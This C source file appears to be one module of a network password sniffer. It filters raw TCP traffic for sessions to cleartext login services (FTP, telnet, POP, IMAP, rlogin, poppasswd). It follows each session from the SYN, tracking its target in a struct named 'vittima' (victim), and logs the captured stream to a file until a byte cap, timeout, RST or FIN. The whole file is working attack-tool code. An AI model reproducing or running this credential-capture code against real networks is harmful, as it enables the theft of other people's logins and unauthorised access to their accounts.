#include "sniff.h"

extern struct iphdr  *ip;
extern struct tcphdr *tcp;
extern struct victim vittima;
extern FILE *fp;

int sniffData(void)
{
  int p;
  p=0;
  if(ip->protocol != 6) 
    return 0;
  if(vittima.active)   
    if(vittima.bytes_read > CAPTLEN)
      {
	fprintf(fp, "\n.......... {CAPLEN Exceeded}\n");
	azzeraVittima();
	return 0;
      }
  if(vittima.active)
    if(time(NULL) > (vittima.start_time + TIMEOUT))
      {
	fprintf(fp, "\n.......... {Timed Out}\n");
	azzeraVittima();
	return 0;
      }                                                                                                                  
  if(ntohs(tcp->dest)==21)  
    p=1; /* ftp */
  if(ntohs(tcp->dest)==23)  
    p=1; /* telnet */
  if(ntohs(tcp->dest)==110) 
    p=1; /* pop3 */
  if(ntohs(tcp->dest)==109) 
    p=1; /* pop2 */
  if(ntohs(tcp->dest)==143) 
    p=1; /* imap2 */
  if(ntohs(tcp->dest)==513) 
    p=1; /* rlogin */
  if(ntohs(tcp->dest)==106) 
    p=1; /* poppasswd */
  if(!vittima.active)
    if(p == 1)
      if(tcp->syn == 1)
	{
	  vittima.saddr=ip->saddr;
	  vittima.daddr=ip->daddr;
	  vittima.active=1;
	  vittima.sport=tcp->source;
	  vittima.dport=tcp->dest;
	  vittima.bytes_read=0;
	  vittima.start_time=time(NULL);
	  printHeader();
	}  
  if(tcp->dest != vittima.dport) 
    return 0;
  if(tcp->source != vittima.sport) 
    return 0;
  if(ip->saddr != vittima.saddr) 
    return 0;
  if(ip->daddr != vittima.daddr) 
    return 0;
  if(tcp->rst == 1) 
    {
      vittima.active=0;
      alarm(0);
      fprintf(fp, "\n.......... {RST}\n");
      azzeraVittima();
      return 0;
    }
  if(tcp->fin == 1) 
    {
      vittima.active=0;
      alarm(0);
      fprintf(fp, "\n.......... {FIN}\n");
      azzeraVittima();
      return 0;
    }
  return 1;
}